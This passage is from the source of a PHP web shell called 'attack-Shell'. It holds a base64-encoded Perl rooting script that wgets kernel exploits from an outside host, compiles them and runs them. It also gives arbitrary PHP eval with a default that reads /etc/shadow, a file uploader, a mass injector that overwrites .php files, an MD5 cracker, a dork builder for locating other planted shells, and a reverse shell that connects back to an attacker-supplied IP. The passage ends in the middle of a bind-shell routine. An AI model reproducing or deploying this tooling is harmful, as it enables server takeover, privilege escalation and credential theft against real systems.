1065 | K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
1066 | Yy8yOC5jIik7IA0Kc3lzdGVtKCJnY2MgMjguYyAtbyAyOCIpOyANCnN5c3RlbSgiY2htb2QgNzc3
1067 | IDI4Iik7IA0Kc3lzdGVtKCIuLzI4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi8yOCIp
1068 | OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
1069 | K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
1070 | Yy8yNy5jIik7IA0Kc3lzdGVtKCJnY2MgMjcuYyAtbyAyNyIpOyANCnN5c3RlbSgiY2htb2QgNzc3
1071 | IDI3Iik7IA0Kc3lzdGVtKCIuLzI3Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi8yNyIp
1072 | OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
1073 | K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
1074 | Yy9jLmMiKTsgDQpzeXN0ZW0oImdjYyBjLmMgLW8gYyIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGMi
1075 | KTsgDQpzeXN0ZW0oIi4vYyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vYyIpOyANCnN5
1076 | c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
1077 | IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9jMi5j
1078 | Iik7IA0Kc3lzdGVtKCJnY2MgYzIuYyAtbyBjMiIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGMyIik7
1079 | IA0Kc3lzdGVtKCIuL2MyIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9jMiIpOyANCnN5
1080 | c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
1081 | IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8wNSIp
1082 | OyANCnN5c3RlbSgiY2htb2QgNzc3IDA1Iik7IA0Kc3lzdGVtKCIuLzA1Iik7IA0Kc3lzdGVtKCJp
1083 | ZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsgDQpzeXN0
1084 | ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2lza28iKTsgDQpz
1085 | eXN0ZW0oImNobW9kIDc3NyBpc2tvIik7IA0Kc3lzdGVtKCIuL2lza28iKTsgDQpzeXN0ZW0oImlk
1086 | Iik7DQpzeXN0ZW0oIi4vaXNrbyIpOyANCnN5c3RlbSgiaXNrbyIpOw0KcHJpbnQgIklmIHUgciBy
1087 | MDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
1088 | MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMTgiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyAxOCIpOyAN
1089 | CnN5c3RlbSgiLi8xOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vMTgiKTsgDQpzeXN0
1090 | ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyAN
1091 | CnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvNyIpOyAN
1092 | CnN5c3RlbSgiY2htb2QgNzc3IDciKTsgDQpzeXN0ZW0oIi4vNyIpOyANCnN5c3RlbSgiaWQiKTsg
1093 | DQpzeXN0ZW0oIi4vNyIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3Rv
1094 | cCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9D
1095 | TVNfRklMRVMvZmlsZS9jYy83LTIiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyA3LTIiKTsgDQpzeXN0
1096 | ZW0oIi4vNy0yIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi83LTIiKTsgDQpzeXN0ZW0o
1097 | ImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5
1098 | c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvOCIpOyANCnN5
1099 | c3RlbSgiY2htb2QgNzc3IDgiKTsgDQpzeXN0ZW0oIi4vOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpz
1100 | eXN0ZW0oIi4vOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4
1101 | cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNf
1102 | RklMRVMvZmlsZS9jYy84YSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDhhIik7IA0Kc3lzdGVtKCIu
1103 | LzhhIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi84YSIpOyANCnN5c3RlbSgiaWQiKTsg
1104 | DQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3
1105 | Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy84YmIiKTsgDQpzeXN0ZW0o
1106 | ImNobW9kIDc3NyA4YmIiKTsgDQpzeXN0ZW0oIi4vOGJiIik7IA0Kc3lzdGVtKCJpZCIpOyANCnBy
1107 | aW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsgDQpzeXN0ZW0oIndnZXQg
1108 | aHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzhjYyIpOyANCnN5c3RlbSgiY2ht
1109 | b2QgNzc3IDhjYyIpOyANCnN5c3RlbSgiLi84Y2MiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQg
1110 | IklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRw
1111 | Oi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvOHgiKTsgDQpzeXN0ZW0oImNobW9kIDc3
1112 | NyA4eCIpOyANCnN5c3RlbSgiLi84eCIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vOHgi
1113 | KTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3Ry
1114 | bCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUv
1115 | Y2MvOSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDkiKTsgDQpzeXN0ZW0oIi4vOSIpOyANCnN5c3Rl
1116 | bSgiaWQiKTsgDQpzeXN0ZW0oIi4vOSIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
1117 | IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
1118 | OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9rcmFkMiIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGty
1119 | YWQyIik7IA0Kc3lzdGVtKCIuL2tyYWQyIik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9r
1120 | cmFkMiAtdCAxIC1wIDIiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2tyYWQyIC10IDEg
1121 | LXAgMyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4va3JhZDIgLXQgMSAtcCA0Iik7IA0K
1122 | c3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rcmFkMiAtdCAxIC1wIDUiKTsgDQpzeXN0ZW0oImlk
1123 | Iik7IA0Kc3lzdGVtKCIuL2tyYWQyIC10IDEgLXAgNiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0
1124 | ZW0oIi4va3JhZDIgLXQgMSAtcCA3Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rcmFk
1125 | MiAtdCAxIC1wIDgiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3Ag
1126 | eHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01T
1127 | X0ZJTEVTL2ZpbGUvY2Mva3JhZCIpOyANCnN5c3RlbSgiY2htb2QgNzc3IGtyYWQiKTsgDQpzeXN0
1128 | ZW0oIi4va3JhZCIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4va3JhZCAtdCAxIC1wIDIi
1129 | KTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2tyYWQgLXQgMSAtcCAzIik7IA0Kc3lzdGVt
1130 | KCJpZCIpOyANCnN5c3RlbSgiLi9rcmFkIC10IDEgLXAgNCIpOyANCnN5c3RlbSgiaWQiKTsgDQpz
1131 | eXN0ZW0oIi4va3JhZCAtdCAxIC1wIDUiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2ty
1132 | YWQgLXQgMSAtcCA2Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rcmFkIC10IDEgLXAg
1133 | NyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4va3JhZCAtdCAxIC1wIDgiKTsgDQpzeXN0
1134 | ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmls
1135 | ZS9jYy9rLXJhZDMiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyBrLXJhZDMiKTsgDQpzeXN0ZW0oIi4v
1136 | ay1yYWQzIC10IDEgLXAgMiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10
1137 | IDEgLXAgMyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10IDEgLXAgNCIp
1138 | OyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10IDEgLXAgNSIpOyANCnN5c3Rl
1139 | bSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10IDEgLXAgNiIpOyANCnN5c3RlbSgiaWQiKTsg
1140 | DQpzeXN0ZW0oIi4vay1yYWQzIC10LXAgMiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4v
1141 | ay1yYWQzIC10IC1wIDIiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2stcmFkMyAtYSAt
1142 | cCA3Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rLXJhZDMgLWEgLXAgNyIpOyANCnN5
1143 | c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
1144 | IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8yNjgi
1145 | KTsgDQpzeXN0ZW0oImNobW9kIDc3NyAyNjgiKTsgDQpzeXN0ZW0oIi4vMjY4Iik7IA0KcHJpbnQg
1146 | IklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRw
1147 | Oi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMjAwOCIpOyANCnN5c3RlbSgiY2htb2Qg
1148 | Nzc3IDIwMDgiKTsgDQpzeXN0ZW0oIi4vMjAwOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAi
1149 | SWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7ICANCnN5c3RlbSgid2dldCBodHRw
1150 | Oi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMjAwOXguYyIpOyANCnN5c3RlbSgiZ2Nj
1151 | IDIwMDl4LmMgLW8gMjAwOXgiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjAwOXgiKTsgDQpzeXN0
1152 | ZW0oIi4vMjAwOXgiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3Ag
1153 | eHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNf
1154 | RklMRVMvZmlsZS9jYy8yMDA5eHgiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjAwOXh4Iik7IA0K
1155 | c3lzdGVtKCIuLzIwMDl4eCIpOyANCnN5c3RlbSgiaWQiKTsNCnN5c3RlbSgiaWQiKTsgDQpwcmlu
1156 | dCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0
1157 | dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8yLjYuOS01NS0yMDA3LXBydjgiKTsg
1158 | DQpzeXN0ZW0oImNobW9kIDc3NyAyLjYuOS01NS0yMDA3LXBydjgiKTsgDQpzeXN0ZW0oIi4vMi42
1159 | LjktNTUtMjAwNy1wcnY4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi8yLjYuOS01NS0y
1160 | MDA3LXBydjgiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuLzIuNi45LTU1LTIwMDctcHJ2
1161 | OCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBj
1162 | dHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmls
1163 | ZS9jYy8xOCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAxOCIpOyANCnN5c3RlbSgiLi8xOCIpOyAN
1164 | CnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxF
1165 | Uy9maWxlL2NjLzgiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgOCIpOyANCnN5c3RlbSgiLi84Iik7
1166 | IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJ
1167 | TEVTL2ZpbGUvY2MvZHoiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZHoiKTsgDQpzeXN0ZW0oIi4v
1168 | ZHoiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9D
1169 | TVNfRklMRVMvZmlsZS9jYy94ODYiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgeDg2Iik7IA0Kc3lz
1170 | dGVtKCIuL3g4NiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5
1171 | NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2xvbCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBsb2wi
1172 | KTsgDQpzeXN0ZW0oIi4vbG9sIik7IA0Kc3lzdGVtKCJpZCIpOyANCn0=";
1173 | 
1174 |      $fd = fopen("r00t.pl","w");
1175 | 
1176 |             if ($fd != FALSE)
1177 |             {
1178 |                 fwrite($fd,base64_decode($r00t));
1179 |                 $out = exec_all("perl r00t.pl;");
1180 |             	if ($out != "")
1181 |             	{
1182 | 			$cmd_out = exec_all("whoami");
1183 | 			if ($cmd_out != "")
1184 | 			{
1185 | 				if (strpos($cmd_out == 'root') !== false)
1186 | 					echo "<p class='alert_green'>You are ".trim(exec_all("whoami"))."</p>";
1187 | 				else
1188 | 					echo "<p class='alert_red'>You are ".trim(exec_all("whoami"))."</p>";
1189 | 			}
1190 | 			else
1191 | 			{
1192 | 				echo "<p class='alert_red'>Rooting Failed</p>";
1193 | 			}
1194 |             	}
1195 | 	    }
1196 |             else
1197 |             {
1198 |                 echo "<p class='alert_red'>Permission Denied</p>";
1199 |             }
1200 |     ?>
1201 |     <?php
1202 | }
1203 | 
1204 | // PHP evaluate
1205 | 
1206 | else if(isset($_GET['eval']))
1207 | {
1208 |     ?>
1209 | 
1210 |     <form method="POST">
1211 |     <textarea name="code" class="cmd" cols="100" rows="20"><?php
1212 |     // If the comand was sent
1213 |     if(isset($_POST['code'])
1214 |         && $_POST['code']
1215 |     )
1216 |     {
1217 |         // Filter Some Chars we dont need
1218 | 
1219 |         $code = str_replace("<?php","",$_POST['code']);
1220 |         $code = str_replace("<?","",$code);
1221 |         $code = str_replace("?>","",$code);
1222 | 
1223 |         // Evaluate PHP CoDE!
1224 | 
1225 |         echo htmlspecialchars(eval($code));
1226 |     }
1227 |     else
1228 |     {
1229 |         ?>echo file_get_contents('/etc/shadow');<?php
1230 |     }
1231 |     ?></textarea><br /><br />
1232 |     <input name="submit" value="Eval That COde! :D" class="own" type="submit" />
1233 |     </form>
1234 | 
1235 |     <?php
1236 | 
1237 | }
1238 | 
1239 | // Upload
1240 | 
1241 | else if(isset($_GET['upload']))
1242 | {
1243 | 
1244 |     if (isset($_POST['file']) &&
1245 |         isset($_POST['path'])
1246 |      )
1247 |     {
1248 |         $path = $_POST['path'];
1249 | 
1250 |         if($path[(strlen($path)-1)] != $SEPARATOR){$path = $path.$SEPARATOR;}
1251 | 
1252 |         if(is_dir($path))
1253 |         {
1254 |             $uploadedFilePath = $_FILES['file']['name'];
1255 |             $tempName = $_FILES['file']['tmp_name'];
1256 |             $uploadPath = $path .  $uploadedFilePath;
1257 |             $stat = move_uploaded_file($tempName , $uploadedFilePath);
1258 |             if ($stat)
1259 |             {
1260 |                 echo "<p class='alert_green'>File uploaded to $uploadPath</p>";
1261 |             }
1262 |             else
1263 |             {
1264 |                 echo "<p class='alert_red'>Failed to upload file to $uploadPath</p>";
1265 |             }
1266 |          }
1267 |     }
1268 |     else
1269 |     {
1270 |     ?>
1271 |     <table class="bind" align="center" >
1272 |     <tr>
1273 |         <th class="header" colspan="1" width="50px">Upload (From your computer)</th>
1274 |     </tr>
1275 |     <tr>
1276 |          <td>
1277 |             <table style="border-spacing: 6px;">
1278 |                 <form method="POST" enctype="multipart/form-data">
1279 | 
1280 |                 <tr>
1281 |                     <td width="100"><input type="file" name="file"/></td>
1282 |                     <td><input type="submit" name="file" class="own" value="Upload"/></td>
1283 | 
1284 |                 </tr>
1285 | 
1286 |                  <tr>
1287 |                     <td colspan="2">
1288 |                         <input class='cmd' style="width: 280px;" name='path' value="<?php echo getcwd(); ?>" />
1289 |                     </td>
1290 |                 </tr>
1291 | 
1292 |                 </form>
1293 |             </table>
1294 |          </td>
1295 |     </tr>
1296 |     </table>
1297 | <?php
1298 |     }
1299 | 
1300 | }
1301 | 
1302 | // Code Injector
1303 | 
1304 | else if(isset($_GET['injector']))
1305 | {
1306 |     if(isset($_GET['dir']) &&
1307 |     $_GET['dir'] != '' &&
1308 |     isset($_GET['filetype']) &&
1309 |     $_GET['filetype'] != '' &&
1310 |     isset($_GET['mode']) &&
1311 |     $_GET['mode'] != '' &&
1312 |     isset($_GET['message']) &&
1313 |     $_GET['message'] != ''
1314 |     )
1315 |     {
1316 |         $dir = $_GET['dir'];
1317 |         $filetype = $_GET['filetype'];
1318 |         $message = $_GET['message'];
1319 | 
1320 |         $mode = "a"; //default mode
1321 | 
1322 | 
1323 |         // Modes Begin
1324 | 
1325 |         if($_GET['mode'] == 'Apender')
1326 |         {
1327 |             $mode = "a";
1328 |         }
1329 |         if($_GET['mode'] == 'Overwriter')
1330 |         {
1331 |             $mode = "w";
1332 |         }
1333 | 
1334 |         if($handle = opendir($dir))
1335 |         {
1336 |             ?>
1337 |             Overwritten Files :-
1338 |             <ul style="padding: 10px;" >
1339 |             <?php
1340 |             while(($file = readdir($handle)) !== False)
1341 |             {
1342 |                 if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
1343 |                 {
1344 |                     ?>
1345 |                         <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
1346 |                     <?php
1347 |                     echo "\n";
1348 |                     $fd = fopen($dir.$file,$mode);
1349 | 		    if (!$fd) echo "<p class='alert_red'>Permission Denied</p>"; break;
1350 |                     fwrite($fd,$message);
1351 |                 }
1352 |             }
1353 |             ?>
1354 |             </ul>
1355 |             <?php
1356 |         }
1357 |     }
1358 |     else
1359 |     {
1360 |         ?>
1361 |         <table id="margins" >
1362 |         <tr>
1363 |             <form method='GET'>
1364 |             <input type="hidden" name="injector"/>
1365 |                 <tr>
1366 |                     <td width="100" class="title">
1367 |                         Directory
1368 |                     </td>
1369 |                     <td>
1370 |                          <input class="cmd" name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
1371 |                     </td>
1372 |                 </tr>
1373 |                 <tr>
1374 |                 <td class="title">
1375 |                     Mode
1376 |                 </td>
1377 |                 <td>
1378 |                         <select style="width: 400px;" name="mode" class="cmd">
1379 |                             <option value="Apender">Apender</option>
1380 |                             <option value="Overwriter">Overwriter</option>
1381 |                         </select>
1382 |                 </td>
1383 |                 </tr>
1384 |                 <tr>
1385 |                     <td class="title">
1386 |                         File Type
1387 |                     </td>
1388 |                     <td>
1389 |                         <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
1390 |                     </td>
1391 |                 </tr>
1392 | 
1393 | 
1394 |                 <tr>
1395 |                     <td rowspan="2">
1396 |                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Inject :D"/>
1397 |                     </td>
1398 |                 </tr>
1399 |         </form>
1400 |         </table>
1401 |         <?php
1402 |     }
1403 | }
1404 | 
1405 | // MD5 Cracker
1406 | 
1407 | else if(isset($_GET['md5']))
1408 | {
1409 |     if(isset($_GET['hash']) &&
1410 |     isset($_GET['passwdList']) &&
1411 |     $_GET['hash'] != '' &&
1412 |     $_GET['passwdList'] != '')
1413 | 
1414 |     {
1415 |         echo md5Crack($_GET['hash'],$_GET['passwdList']);
1416 |     }
1417 |     else
1418 |     {
1419 |         ?>
1420 |         <table id="margins" >
1421 |         <tr>
1422 |             <form method='GET'>
1423 |                 <input type="hidden" name="md5" />
1424 |                 <tr>
1425 |                     <td width="100" class="title">
1426 |                         Hash
1427 |                     </td>
1428 |                     <td>
1429 |                          <input class="cmd" name="hash"/>
1430 |                     </td>
1431 |                 </tr>
1432 |                 <tr>
1433 |                 <td class="title">
1434 |                     Password List (File Path)
1435 |                 </td>
1436 |                 <td>
1437 |                     <input class="cmd" name="passwdList" value="<?php echo getcwd().$SEPARATOR; ?>" />
1438 |                 </td>
1439 |                 </tr>
1440 |                 <tr>
1441 |                 <tr>
1442 |                     <td rowspan="2">
1443 |                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Lets Crack :D"/>
1444 |                     </td>
1445 |                 </tr>
1446 |         </form>
1447 |         </table>
1448 | 
1449 |         <?php
1450 |     }
1451 | }
1452 | 
1453 | // Google Dork Creater
1454 | 
1455 | else if(isset($_GET['gdork']))
1456 | {
1457 |     if(
1458 |     isset($_GET['title']) ||
1459 |     isset($_GET['text']) ||
1460 |     isset($_GET['url']) ||
1461 |     isset($_GET['site'])
1462 |     )
1463 |     {
1464 |         $title = $_GET['title'];
1465 |         $text = $_GET['text'];
1466 |         $url = $_GET['url'];
1467 |         $site = $_GET['site'];
1468 | 
1469 |         if($title != "")
1470 |         {
1471 |             $title = " intitle:\"".$title."\" ";
1472 |         }
1473 |         if($text != "")
1474 |         {
1475 |             $text = " intext:\"".$text."\" ";
1476 |         }
1477 |         if($url != "")
1478 |         {
1479 |             $url = " inurl:\"".$url."\" ";
1480 |         }
1481 |         if($site != "")
1482 |         {
1483 |             $site = " site:\"".$site."\" ";
1484 |         }
1485 | 
1486 |         // Print the output now
1487 |         ?>
1488 |         <div align="center">
1489 |         <form action="http://google.com" method="GET">
1490 |             <input class="cmd" style="border: solid red 1px;" name="q" value='<?php echo $title.$text.$url.$site ?>' /><br />
1491 |             <input type="submit" style="Padding:5px;" class="own" value='Google It! ;)' />
1492 |         </form>
1493 |         </div>
1494 |         <?php
1495 |     }
1496 |     else
1497 |     {
1498 |     ?>
1499 |     <p align="center" style="color:red;">Note : Any one of the following options is compulsory to be filled rest can be left blank.</p>
1500 |      <table id="margins" >
1501 |         <tr>
1502 |             <form method='GET'>
1503 |                 <input type="hidden" name="gdork" />
1504 |                 <tr>
1505 |                     <td width="100" class="title">
1506 |                         intitle
1507 |                     </td>
1508 |                     <td>
1509 |                          <input class="cmd" name="title" value="attack-Shell"/>
1510 |                     </td>
1511 |                 </tr>
1512 |                 <tr>
1513 |                 <td class="title">
1514 |                     intext
1515 |                 </td>
1516 |                 <td>
1517 |                     <input class="cmd" name="text" value="ATTACK!" />
1518 |                 </td>
1519 |                 </tr>
1520 |                 <tr>
1521 |                     <td width="100" class="title">
1522 |                         inurl
1523 |                     </td>
1524 |                     <td>
1525 |                          <input class="cmd" name="url" value="attack-Shell.php"/>
1526 |                     </td>
1527 |                 </tr>
1528 |                 <tr>
1529 |                     <td width="100" class="title">
1530 |                         site
1531 |                     </td>
1532 |                     <td>
1533 |                          <input class="cmd" name="site" value="*.org"/>
1534 |                     </td>
1535 |                 </tr>
1536 |                 <tr>
1537 |                     <td rowspan="2" >
1538 |                         <input style="margin : 20px; margin-left: 390px; padding : 10px;" type="submit" class="own" value="Gimme the Dork!"/>
1539 |                     </td>
1540 |                 </tr>
1541 |         </form>
1542 |         </table>
1543 |     <?php
1544 |     }
1545 | }
1546 | 
1547 | 
1548 | // Connect
1549 | 
1550 | 
1551 | else if(isset($_GET['connect']))
1552 | {
1553 |     if(isset($_POST['ip']) &&
1554 |      isset($_POST['port']) &&
1555 |         $_POST['ip'] != "" &&
1556 |         $_POST['port'] != ""
1557 |      )
1558 |     {
1559 |         echo "<p>The Program is now trying to connect!</p>";
1560 |         $ip = $_POST['ip'];
1561 |         $port=$_POST['port'];
1562 |         $sockfd=fsockopen($ip , $port , $errno, $errstr );
1563 |         if($errno != 0)
1564 |         {
1565 |             echo "<font color='red'><b>$errno</b> : $errstr</font>";
1566 |         }
1567 |         else if (!$sockfd)
1568 |         {
1569 |                $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
1570 |         }
1571 |         else
1572 |         {
1573 |             fputs ($sockfd ,"\n=================================================================\nAttack Shell\n=================================================================");
1574 |          $pwd = exec_all("pwd");
1575 |          $sysinfo = exec_all("uname -a");
1576 |          $id = exec_all("id");
1577 |          $dateAndTime = exec_all("time /t & date /T");
1578 |          $len = 1337;
1579 |          fputs($sockfd ,$sysinfo . "\n" );
1580 |          fputs($sockfd ,$pwd . "\n" );
1581 |          fputs($sockfd ,$id ."\n\n" );
1582 |          fputs($sockfd ,$dateAndTime."\n\n" );
1583 |          while(!feof($sockfd))
1584 |          {
1585 |             $cmdPrompt ="(attack-Shell)[$]> ";
1586 |             fputs ($sockfd , $cmdPrompt );
1587 |             $command= fgets($sockfd, $len);
1588 |             fputs($sockfd , "\n" . exec_all($command) . "\n\n");
1589 |         }
1590 |         fclose($sockfd);
1591 |         }
1592 |     }
1593 |     else if(
1594 |     isset($_POST['port']) &&
1595 |     isset($_POST['passwd']) &&
1596 |     $_POST['port'] != "" &&
1597 |     $_POST['passwd'] != ""  &&
1598 |     isset($_POST['mode']))
1599 |     {
1600 |         $address = '127.0.0.1';
1601 |         $port = $_POST['port'];
1602 |         $pass = $_POST['passwd'];
1603 | 
1604 |         if($_POST['mode'] == "Python")
1605 |         {
